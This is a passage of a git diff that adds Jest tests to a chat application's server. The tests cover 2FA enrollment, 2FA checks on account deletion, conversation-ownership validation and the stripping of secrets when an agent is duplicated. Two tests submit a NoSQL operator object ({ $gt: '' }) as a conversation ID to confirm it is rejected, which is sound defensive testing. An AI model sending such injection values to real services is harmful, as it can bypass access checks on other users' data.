mockEncryptV3(...args), + logger: { error: jest.fn() }, +})); + +jest.mock('~/server/services/twoFactorService', () => ({ + verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args), + generateBackupCodes: (...args) => mockGenerateBackupCodes(...args), + generateTOTPSecret: (...args) => mockGenerateTOTPSecret(...args), + verifyBackupCode: jest.fn(), + getTOTPSecret: jest.fn(), + verifyTOTP: jest.fn(), +})); + +jest.mock('~/models', () => ({ + getUserById: (...args) => mockGetUserById(...args), + updateUser: (...args) => mockUpdateUser(...args), +})); + +const { enable2FA, regenerateBackupCodes } = require('~/server/controllers/TwoFactorController'); + +function createRes() { + const res = {}; + res.status = jest.fn().mockReturnValue(res); + res.json = jest.fn().mockReturnValue(res); + return res; +} + +const PLAIN_CODES = ['code1', 'code2', 'code3']; +const CODE_OBJECTS = [ + { codeHash: 'h1', used: false, usedAt: null }, + { codeHash: 'h2', used: false, usedAt: null }, + { codeHash: 'h3', used: false, usedAt: null }, +]; + +beforeEach(() => { + jest.clearAllMocks(); + mockGenerateTOTPSecret.mockReturnValue('NEWSECRET'); + mockGenerateBackupCodes.mockResolvedValue({ plainCodes: PLAIN_CODES, codeObjects: CODE_OBJECTS }); + mockEncryptV3.mockReturnValue('encrypted-secret'); +}); + +describe('enable2FA', () => { + it('allows first-time setup without token — writes to pending fields', async () => { + const req = { user: { id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false, email: 'a@b.com' }); + mockUpdateUser.mockResolvedValue({ email: 'a@b.com' }); + + await enable2FA(req, res); + + expect(res.status).toHaveBeenCalledWith(200); + expect(res.json).toHaveBeenCalledWith( + expect.objectContaining({ otpauthUrl: expect.any(String), backupCodes: PLAIN_CODES }), + ); + expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled(); + const updateCall = mockUpdateUser.mock.calls[0][1]; + 
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret'); + expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS); + expect(updateCall).not.toHaveProperty('twoFactorEnabled'); + expect(updateCall).not.toHaveProperty('totpSecret'); + expect(updateCall).not.toHaveProperty('backupCodes'); + }); + + it('re-enrollment writes to pending fields, leaving live 2FA intact', async () => { + const req = { user: { id: 'user1' }, body: { token: '123456' } }; + const res = createRes(); + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + email: 'a@b.com', + }; + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + mockUpdateUser.mockResolvedValue({ email: 'a@b.com' }); + + await enable2FA(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({ + user: existingUser, + token: '123456', + backupCode: undefined, + persistBackupUse: false, + }); + expect(res.status).toHaveBeenCalledWith(200); + const updateCall = mockUpdateUser.mock.calls[0][1]; + expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret'); + expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS); + expect(updateCall).not.toHaveProperty('twoFactorEnabled'); + expect(updateCall).not.toHaveProperty('totpSecret'); + }); + + it('allows re-enrollment with valid backup code (persistBackupUse: false)', async () => { + const req = { user: { id: 'user1' }, body: { backupCode: 'backup123' } }; + const res = createRes(); + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + email: 'a@b.com', + }; + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + mockUpdateUser.mockResolvedValue({ email: 'a@b.com' }); + + await enable2FA(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith( + expect.objectContaining({ 
persistBackupUse: false }), + ); + expect(res.status).toHaveBeenCalledWith(200); + }); + + it('returns error when no token provided and 2FA is enabled', async () => { + const req = { user: { id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 }); + + await enable2FA(req, res); + + expect(res.status).toHaveBeenCalledWith(400); + expect(mockUpdateUser).not.toHaveBeenCalled(); + }); + + it('returns 401 when invalid token provided and 2FA is enabled', async () => { + const req = { user: { id: 'user1' }, body: { token: 'wrong' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ + verified: false, + status: 401, + message: 'Invalid token or backup code', + }); + + await enable2FA(req, res); + + expect(res.status).toHaveBeenCalledWith(401); + expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' }); + expect(mockUpdateUser).not.toHaveBeenCalled(); + }); +}); + +describe('regenerateBackupCodes', () => { + it('returns 404 when user not found', async () => { + const req = { user: { id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue(null); + + await regenerateBackupCodes(req, res); + + expect(res.status).toHaveBeenCalledWith(404); + expect(res.json).toHaveBeenCalledWith({ message: 'User not found' }); + }); + + it('requires OTP when 2FA is enabled', async () => { + const req = { user: { id: 'user1' }, body: { token: '123456' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + mockUpdateUser.mockResolvedValue({}); + + await 
regenerateBackupCodes(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(200); + expect(res.json).toHaveBeenCalledWith({ + backupCodes: PLAIN_CODES, + backupCodesHash: CODE_OBJECTS, + }); + }); + + it('returns error when no token provided and 2FA is enabled', async () => { + const req = { user: { id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 }); + + await regenerateBackupCodes(req, res); + + expect(res.status).toHaveBeenCalledWith(400); + }); + + it('returns 401 when invalid token provided and 2FA is enabled', async () => { + const req = { user: { id: 'user1' }, body: { token: 'wrong' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ + verified: false, + status: 401, + message: 'Invalid token or backup code', + }); + + await regenerateBackupCodes(req, res); + + expect(res.status).toHaveBeenCalledWith(401); + expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' }); + }); + + it('includes backupCodesHash in response', async () => { + const req = { user: { id: 'user1' }, body: { token: '123456' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + mockUpdateUser.mockResolvedValue({}); + + await regenerateBackupCodes(req, res); + + const responseBody = res.json.mock.calls[0][0]; + expect(responseBody).toHaveProperty('backupCodesHash', CODE_OBJECTS); + expect(responseBody).toHaveProperty('backupCodes', PLAIN_CODES); + }); + + it('allows regeneration without token when 2FA is not enabled', 
async () => { + const req = { user: { id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: false, + }); + mockUpdateUser.mockResolvedValue({}); + + await regenerateBackupCodes(req, res); + + expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(200); + expect(res.json).toHaveBeenCalledWith({ + backupCodes: PLAIN_CODES, + backupCodesHash: CODE_OBJECTS, + }); + }); +}); diff --git a/api/server/controllers/__tests__/deleteUser.spec.js b/api/server/controllers/__tests__/deleteUser.spec.js new file mode 100644 index 0000000000..d0f54a046f --- /dev/null +++ b/api/server/controllers/__tests__/deleteUser.spec.js @@ -0,0 +1,302 @@ +const mockGetUserById = jest.fn(); +const mockDeleteMessages = jest.fn(); +const mockDeleteAllUserSessions = jest.fn(); +const mockDeleteUserById = jest.fn(); +const mockDeleteAllSharedLinks = jest.fn(); +const mockDeletePresets = jest.fn(); +const mockDeleteUserKey = jest.fn(); +const mockDeleteConvos = jest.fn(); +const mockDeleteFiles = jest.fn(); +const mockGetFiles = jest.fn(); +const mockUpdateUserPlugins = jest.fn(); +const mockUpdateUser = jest.fn(); +const mockFindToken = jest.fn(); +const mockVerifyOTPOrBackupCode = jest.fn(); +const mockDeleteUserPluginAuth = jest.fn(); +const mockProcessDeleteRequest = jest.fn(); +const mockDeleteToolCalls = jest.fn(); +const mockDeleteUserAgents = jest.fn(); +const mockDeleteUserPrompts = jest.fn(); + +jest.mock('@librechat/data-schemas', () => ({ + logger: { error: jest.fn(), info: jest.fn() }, + webSearchKeys: [], +})); + +jest.mock('librechat-data-provider', () => ({ + Tools: {}, + CacheKeys: {}, + Constants: { mcp_delimiter: '::', mcp_prefix: 'mcp_' }, + FileSources: {}, +})); + +jest.mock('@librechat/api', () => ({ + MCPOAuthHandler: {}, + MCPTokenStorage: {}, + normalizeHttpError: jest.fn(), + extractWebSearchEnvVars: jest.fn(), +})); + +jest.mock('~/models', () => ({ + 
deleteAllUserSessions: (...args) => mockDeleteAllUserSessions(...args), + deleteAllSharedLinks: (...args) => mockDeleteAllSharedLinks(...args), + updateUserPlugins: (...args) => mockUpdateUserPlugins(...args), + deleteUserById: (...args) => mockDeleteUserById(...args), + deleteMessages: (...args) => mockDeleteMessages(...args), + deletePresets: (...args) => mockDeletePresets(...args), + deleteUserKey: (...args) => mockDeleteUserKey(...args), + getUserById: (...args) => mockGetUserById(...args), + deleteConvos: (...args) => mockDeleteConvos(...args), + deleteFiles: (...args) => mockDeleteFiles(...args), + updateUser: (...args) => mockUpdateUser(...args), + findToken: (...args) => mockFindToken(...args), + getFiles: (...args) => mockGetFiles(...args), +})); + +jest.mock('~/db/models', () => ({ + ConversationTag: { deleteMany: jest.fn() }, + AgentApiKey: { deleteMany: jest.fn() }, + Transaction: { deleteMany: jest.fn() }, + MemoryEntry: { deleteMany: jest.fn() }, + Assistant: { deleteMany: jest.fn() }, + AclEntry: { deleteMany: jest.fn() }, + Balance: { deleteMany: jest.fn() }, + Action: { deleteMany: jest.fn() }, + Group: { updateMany: jest.fn() }, + Token: { deleteMany: jest.fn() }, + User: {}, +})); + +jest.mock('~/server/services/PluginService', () => ({ + updateUserPluginAuth: jest.fn(), + deleteUserPluginAuth: (...args) => mockDeleteUserPluginAuth(...args), +})); + +jest.mock('~/server/services/twoFactorService', () => ({ + verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args), +})); + +jest.mock('~/server/services/AuthService', () => ({ + verifyEmail: jest.fn(), + resendVerificationEmail: jest.fn(), +})); + +jest.mock('~/config', () => ({ + getMCPManager: jest.fn(), + getFlowStateManager: jest.fn(), + getMCPServersRegistry: jest.fn(), +})); + +jest.mock('~/server/services/Config/getCachedTools', () => ({ + invalidateCachedTools: jest.fn(), +})); + +jest.mock('~/server/services/Files/S3/crud', () => ({ + needsRefresh: jest.fn(), + getNewS3URL: 
jest.fn(), +})); + +jest.mock('~/server/services/Files/process', () => ({ + processDeleteRequest: (...args) => mockProcessDeleteRequest(...args), +})); + +jest.mock('~/server/services/Config', () => ({ + getAppConfig: jest.fn(), +})); + +jest.mock('~/models/ToolCall', () => ({ + deleteToolCalls: (...args) => mockDeleteToolCalls(...args), +})); + +jest.mock('~/models/Prompt', () => ({ + deleteUserPrompts: (...args) => mockDeleteUserPrompts(...args), +})); + +jest.mock('~/models/Agent', () => ({ + deleteUserAgents: (...args) => mockDeleteUserAgents(...args), +})); + +jest.mock('~/cache', () => ({ + getLogStores: jest.fn(), +})); + +const { deleteUserController } = require('~/server/controllers/UserController'); + +function createRes() { + const res = {}; + res.status = jest.fn().mockReturnValue(res); + res.json = jest.fn().mockReturnValue(res); + res.send = jest.fn().mockReturnValue(res); + return res; +} + +function stubDeletionMocks() { + mockDeleteMessages.mockResolvedValue(); + mockDeleteAllUserSessions.mockResolvedValue(); + mockDeleteUserKey.mockResolvedValue(); + mockDeletePresets.mockResolvedValue(); + mockDeleteConvos.mockResolvedValue(); + mockDeleteUserPluginAuth.mockResolvedValue(); + mockDeleteUserById.mockResolvedValue(); + mockDeleteAllSharedLinks.mockResolvedValue(); + mockGetFiles.mockResolvedValue([]); + mockProcessDeleteRequest.mockResolvedValue(); + mockDeleteFiles.mockResolvedValue(); + mockDeleteToolCalls.mockResolvedValue(); + mockDeleteUserAgents.mockResolvedValue(); + mockDeleteUserPrompts.mockResolvedValue(); +} + +beforeEach(() => { + jest.clearAllMocks(); + stubDeletionMocks(); +}); + +describe('deleteUserController - 2FA enforcement', () => { + it('proceeds with deletion when 2FA is not enabled', async () => { + const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false }); + + await deleteUserController(req, res); 
+ + expect(res.status).toHaveBeenCalledWith(200); + expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' }); + expect(mockDeleteMessages).toHaveBeenCalled(); + expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled(); + }); + + it('proceeds with deletion when user has no 2FA record', async () => { + const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue(null); + + await deleteUserController(req, res); + + expect(res.status).toHaveBeenCalledWith(200); + expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' }); + }); + + it('returns error when 2FA is enabled and verification fails with 400', async () => { + const req = { user: { id: 'user1', _id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 }); + + await deleteUserController(req, res); + + expect(res.status).toHaveBeenCalledWith(400); + expect(mockDeleteMessages).not.toHaveBeenCalled(); + }); + + it('returns 401 when 2FA is enabled and invalid TOTP token provided', async () => { + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }; + const req = { user: { id: 'user1', _id: 'user1' }, body: { token: 'wrong' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ + verified: false, + status: 401, + message: 'Invalid token or backup code', + }); + + await deleteUserController(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({ + user: existingUser, + token: 'wrong', + backupCode: undefined, + }); + expect(res.status).toHaveBeenCalledWith(401); + expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' }); + expect(mockDeleteMessages).not.toHaveBeenCalled(); + 
}); + + it('returns 401 when 2FA is enabled and invalid backup code provided', async () => { + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + backupCodes: [], + }; + const req = { user: { id: 'user1', _id: 'user1' }, body: { backupCode: 'bad-code' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ + verified: false, + status: 401, + message: 'Invalid token or backup code', + }); + + await deleteUserController(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({ + user: existingUser, + token: undefined, + backupCode: 'bad-code', + }); + expect(res.status).toHaveBeenCalledWith(401); + expect(mockDeleteMessages).not.toHaveBeenCalled(); + }); + + it('deletes account when valid TOTP token provided with 2FA enabled', async () => { + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }; + const req = { + user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, + body: { token: '123456' }, + }; + const res = createRes(); + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + + await deleteUserController(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({ + user: existingUser, + token: '123456', + backupCode: undefined, + }); + expect(res.status).toHaveBeenCalledWith(200); + expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' }); + expect(mockDeleteMessages).toHaveBeenCalled(); + }); + + it('deletes account when valid backup code provided with 2FA enabled', async () => { + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + backupCodes: [{ codeHash: 'h1', used: false }], + }; + const req = { + user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, + body: { backupCode: 'valid-code' }, + }; + const res = createRes(); + 
mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + + await deleteUserController(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({ + user: existingUser, + token: undefined, + backupCode: 'valid-code', + }); + expect(res.status).toHaveBeenCalledWith(200); + expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' }); + expect(mockDeleteMessages).toHaveBeenCalled(); + }); +}); diff --git a/api/server/controllers/agents/__tests__/openai.spec.js b/api/server/controllers/agents/__tests__/openai.spec.js index 835343e798..50c61b7288 100644 --- a/api/server/controllers/agents/__tests__/openai.spec.js +++ b/api/server/controllers/agents/__tests__/openai.spec.js @@ -99,6 +99,7 @@ jest.mock('~/server/services/PermissionService', () => ({ jest.mock('~/models/Conversation', () => ({ getConvoFiles: jest.fn().mockResolvedValue([]), + getConvo: jest.fn().mockResolvedValue(null), })); jest.mock('~/models/Agent', () => ({ @@ -160,6 +161,77 @@ describe('OpenAIChatCompletionController', () => { }; }); + describe('conversation ownership validation', () => { + it('should skip ownership check when conversation_id is not provided', async () => { + const { getConvo } = require('~/models/Conversation'); + await OpenAIChatCompletionController(req, res); + expect(getConvo).not.toHaveBeenCalled(); + }); + + it('should return 400 when conversation_id is not a string', async () => { + const { validateRequest } = require('@librechat/api'); + validateRequest.mockReturnValueOnce({ + request: { model: 'agent-123', messages: [], stream: false, conversation_id: { $gt: '' } }, + }); + + await OpenAIChatCompletionController(req, res); + expect(res.status).toHaveBeenCalledWith(400); + }); + + it('should return 404 when conversation is not owned by user', async () => { + const { validateRequest } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + 
validateRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + messages: [], + stream: false, + conversation_id: 'convo-abc', + }, + }); + getConvo.mockResolvedValueOnce(null); + + await OpenAIChatCompletionController(req, res); + expect(getConvo).toHaveBeenCalledWith('user-123', 'convo-abc'); + expect(res.status).toHaveBeenCalledWith(404); + }); + + it('should proceed when conversation is owned by user', async () => { + const { validateRequest } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + messages: [], + stream: false, + conversation_id: 'convo-abc', + }, + }); + getConvo.mockResolvedValueOnce({ conversationId: 'convo-abc', user: 'user-123' }); + + await OpenAIChatCompletionController(req, res); + expect(getConvo).toHaveBeenCalledWith('user-123', 'convo-abc'); + expect(res.status).not.toHaveBeenCalledWith(404); + }); + + it('should return 500 when getConvo throws a DB error', async () => { + const { validateRequest } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + messages: [], + stream: false, + conversation_id: 'convo-abc', + }, + }); + getConvo.mockRejectedValueOnce(new Error('DB connection failed')); + + await OpenAIChatCompletionController(req, res); + expect(res.status).toHaveBeenCalledWith(500); + }); + }); + describe('token usage recording', () => { it('should call recordCollectedUsage after successful non-streaming completion', async () => { await OpenAIChatCompletionController(req, res); diff --git a/api/server/controllers/agents/__tests__/responses.unit.spec.js b/api/server/controllers/agents/__tests__/responses.unit.spec.js index 45ec31fc68..e34f0ccf73 100644 --- a/api/server/controllers/agents/__tests__/responses.unit.spec.js +++ b/api/server/controllers/agents/__tests__/responses.unit.spec.js @@ -189,6 
+189,102 @@ describe('createResponse controller', () => { }; }); + describe('conversation ownership validation', () => { + it('should skip ownership check when previous_response_id is not provided', async () => { + const { getConvo } = require('~/models/Conversation'); + await createResponse(req, res); + expect(getConvo).not.toHaveBeenCalled(); + }); + + it('should return 400 when previous_response_id is not a string', async () => { + const { validateResponseRequest, sendResponsesErrorResponse } = require('@librechat/api'); + validateResponseRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + input: 'Hello', + stream: false, + previous_response_id: { $gt: '' }, + }, + }); + + await createResponse(req, res); + expect(sendResponsesErrorResponse).toHaveBeenCalledWith( + res, + 400, + 'previous_response_id must be a string', + 'invalid_request', + ); + }); + + it('should return 404 when conversation is not owned by user', async () => { + const { validateResponseRequest, sendResponsesErrorResponse } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateResponseRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + input: 'Hello', + stream: false, + previous_response_id: 'resp_abc', + }, + }); + getConvo.mockResolvedValueOnce(null); + + await createResponse(req, res); + expect(getConvo).toHaveBeenCalledWith('user-123', 'resp_abc'); + expect(sendResponsesErrorResponse).toHaveBeenCalledWith( + res, + 404, + 'Conversation not found', + 'not_found', + ); + }); + + it('should proceed when conversation is owned by user', async () => { + const { validateResponseRequest, sendResponsesErrorResponse } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateResponseRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + input: 'Hello', + stream: false, + previous_response_id: 'resp_abc', + }, + }); + getConvo.mockResolvedValueOnce({ conversationId: 'resp_abc', 
user: 'user-123' }); + + await createResponse(req, res); + expect(getConvo).toHaveBeenCalledWith('user-123', 'resp_abc'); + expect(sendResponsesErrorResponse).not.toHaveBeenCalledWith( + res, + 404, + expect.any(String), + expect.any(String), + ); + }); + + it('should return 500 when getConvo throws a DB error', async () => { + const { validateResponseRequest, sendResponsesErrorResponse } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateResponseRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + input: 'Hello', + stream: false, + previous_response_id: 'resp_abc', + }, + }); + getConvo.mockRejectedValueOnce(new Error('DB connection failed')); + + await createResponse(req, res); + expect(sendResponsesErrorResponse).toHaveBeenCalledWith( + res, + 500, + expect.any(String), + expect.any(String), + ); + }); + }); + describe('token usage recording - non-streaming', () => { it('should call recordCollectedUsage after successful non-streaming completion', async () => { await createResponse(req, res); diff --git a/api/server/controllers/agents/__tests__/v1.duplicate-actions.spec.js b/api/server/controllers/agents/__tests__/v1.duplicate-actions.spec.js new file mode 100644 index 0000000000..cc298bd03a --- /dev/null +++ b/api/server/controllers/agents/__tests__/v1.duplicate-actions.spec.js @@ -0,0 +1,159 @@ +jest.mock('~/server/services/PermissionService', () => ({ + findPubliclyAccessibleResources: jest.fn(), + findAccessibleResources: jest.fn(), + hasPublicPermission: jest.fn(), + grantPermission: jest.fn().mockResolvedValue({}), +})); + +jest.mock('~/server/services/Config', () => ({ + getCachedTools: jest.fn(), + getMCPServerTools: jest.fn(), +})); + +const mongoose = require('mongoose'); +const { actionDelimiter } = require('librechat-data-provider'); +const { agentSchema, actionSchema } = require('@librechat/data-schemas'); +const { MongoMemoryServer } = require('mongodb-memory-server'); +const { 
duplicateAgent } = require('../v1'); + +let mongoServer; + +beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + const mongoUri = mongoServer.getUri(); + if (!mongoose.models.Agent) { + mongoose.model('Agent', agentSchema); + } + if (!mongoose.models.Action) { + mongoose.model('Action', actionSchema); + } + await mongoose.connect(mongoUri); +}, 20000); + +afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); +}); + +beforeEach(async () => { + await mongoose.models.Agent.deleteMany({}); + await mongoose.models.Action.deleteMany({}); +}); + +describe('duplicateAgentHandler — action domain extraction', () => { + it('builds duplicated action entries using metadata.domain, not action_id', async () => { + const userId = new mongoose.Types.ObjectId(); + const originalAgentId = `agent_original`; + + const agent = await mongoose.models.Agent.create({ + id: originalAgentId, + name: 'Test Agent', + author: userId.toString(), + provider: 'openai', + model: 'gpt-4', + tools: [], + actions: [`api.example.com${actionDelimiter}act_original`], + versions: [{ name: 'Test Agent', createdAt: new Date(), updatedAt: new Date() }], + }); + + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_original', + agent_id: originalAgentId, + metadata: { domain: 'api.example.com' }, + }); + + const req = { + params: { id: agent.id }, + user: { id: userId.toString() }, + }; + const res = { + status: jest.fn().mockReturnThis(), + json: jest.fn(), + }; + + await duplicateAgent(req, res); + + expect(res.status).toHaveBeenCalledWith(201); + + const { agent: newAgent, actions: newActions } = res.json.mock.calls[0][0]; + + expect(newAgent.id).not.toBe(originalAgentId); + expect(String(newAgent.author)).toBe(userId.toString()); + expect(newActions).toHaveLength(1); + expect(newActions[0].metadata.domain).toBe('api.example.com'); + expect(newActions[0].agent_id).toBe(newAgent.id); + + for (const actionEntry of newAgent.actions) { + 
const [domain, actionId] = actionEntry.split(actionDelimiter); + expect(domain).toBe('api.example.com'); + expect(actionId).toBeTruthy(); + expect(actionId).not.toBe('act_original'); + } + + const allActions = await mongoose.models.Action.find({}).lean(); + expect(allActions).toHaveLength(2); + + const originalAction = allActions.find((a) => a.action_id === 'act_original'); + expect(originalAction.agent_id).toBe(originalAgentId); + + const duplicatedAction = allActions.find((a) => a.action_id !== 'act_original'); + expect(duplicatedAction.agent_id).toBe(newAgent.id); + expect(duplicatedAction.metadata.domain).toBe('api.example.com'); + }); + + it('strips sensitive metadata fields from duplicated actions', async () => { + const userId = new mongoose.Types.ObjectId(); + const originalAgentId = 'agent_sensitive'; + + await mongoose.models.Agent.create({ + id: originalAgentId, + name: 'Sensitive Agent', + author: userId.toString(), + provider: 'openai', + model: 'gpt-4', + tools: [], + actions: [`secure.api.com${actionDelimiter}act_secret`], + versions: [{ name: 'Sensitive Agent', createdAt: new Date(), updatedAt: new Date() }], + }); + + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_secret', + agent_id: originalAgentId, + metadata: { + domain: 'secure.api.com', + api_key: 'sk-secret-key-12345', + oauth_client_id: 'client_id_xyz', + oauth_client_secret: 'client_secret_xyz', + }, + }); + + const req = { + params: { id: originalAgentId }, + user: { id: userId.toString() }, + }; + const res = { + status: jest.fn().mockReturnThis(), + json: jest.fn(), + }; + + await duplicateAgent(req, res); + + expect(res.status).toHaveBeenCalledWith(201); + + const duplicatedAction = await mongoose.models.Action.findOne({ + agent_id: { $ne: originalAgentId }, + }).lean(); + + expect(duplicatedAction.metadata.domain).toBe('secure.api.com'); + expect(duplicatedAction.metadata.api_key).toBeUndefined(); + 
expect(duplicatedAction.metadata.oauth_client_id).toBeUndefined(); + expect(duplicatedAction.metadata.oauth_client_secret).toBeUndefined(); + + const originalAction = await mongoose.models.Action.findOne({ + action_id: 'act_secret', + }).lean(); + expect(originalAction.metadata.api_key).toBe('sk-secret-key-12345'); + }); +}); diff --git a/api/server/controllers/agents/client.js b/api/server/controllers/agents/client.js index 0ecd62b819..c454bd65cf 100644 --- a/api/server/controllers/agents/client.js +++ b/api/server/controllers/agents/client.js @@ -44,6 +44,7 @@ const { isEphemeralAgentId, removeNullishValues, } = require('librechat-data-provider'); +const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions'); const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens'); const { encodeAndFormat } = require('~/server/services/Files/images/encode'); const { updateBalance, bulkInsertTransactions } = require('~/models'); @@ -479,6 +480,7 @@ class AgentClient extends BaseClient { getUserKeyValues: db.getUserKeyValues, getToolFilesByIds: db.getToolFilesByIds, getCodeGeneratedFiles: db.getCodeGeneratedFiles, + filterFilesByAgentAccess, }, ); diff --git a/api/server/controllers/agents/filterAuthorizedTools.spec.js b/api/server/controllers/agents/filterAuthorizedTools.spec.js new file mode 100644 index 0000000000..259e41fb0d --- /dev/null +++ b/api/server/controllers/agents/filterAuthorizedTools.spec.js @@ -0,0 +1,677 @@ +const mongoose = require('mongoose'); +const { v4: uuidv4 } = require('uuid'); +const { Constants } = require('librechat-data-provider'); +const { agentSchema } = require('@librechat/data-schemas'); +const { MongoMemoryServer } = require('mongodb-memory-server'); + +const d = Constants.mcp_delimiter; + +const mockGetAllServerConfigs = jest.fn(); + +jest.mock('~/server/services/Config', () => ({ + getCachedTools: jest.fn().mockResolvedValue({ + web_search: true, + execute_code: true, + file_search: true, + }), +})); 
+ +jest.mock('~/config', () => ({ + getMCPServersRegistry: jest.fn(() => ({ + getAllServerConfigs: mockGetAllServerConfigs, + })), +})); + +jest.mock('~/models/Project', () => ({ + getProjectByName: jest.fn().mockResolvedValue(null), +})); + +jest.mock('~/server/services/Files/strategies', () => ({ + getStrategyFunctions: jest.fn(), +})); + +jest.mock('~/server/services/Files/images/avatar', () => ({ + resizeAvatar: jest.fn(), +})); + +jest.mock('~/server/services/Files/S3/crud', () => ({ + refreshS3Url: jest.fn(), +})); + +jest.mock('~/server/services/Files/process', () => ({ + filterFile: jest.fn(), +})); + +jest.mock('~/models/Action', () => ({ + updateAction: jest.fn(), + getActions: jest.fn().mockResolvedValue([]), +})); + +jest.mock('~/models/File', () => ({ + deleteFileByFilter: jest.fn(), +})); + +jest.mock('~/server/services/PermissionService', () => ({ + findAccessibleResources: jest.fn().mockResolvedValue([]), + findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]), + grantPermission: jest.fn(), + hasPublicPermission: jest.fn().mockResolvedValue(false), + checkPermission: jest.fn().mockResolvedValue(true), +})); + +jest.mock('~/models', () => ({ + getCategoriesWithCounts: 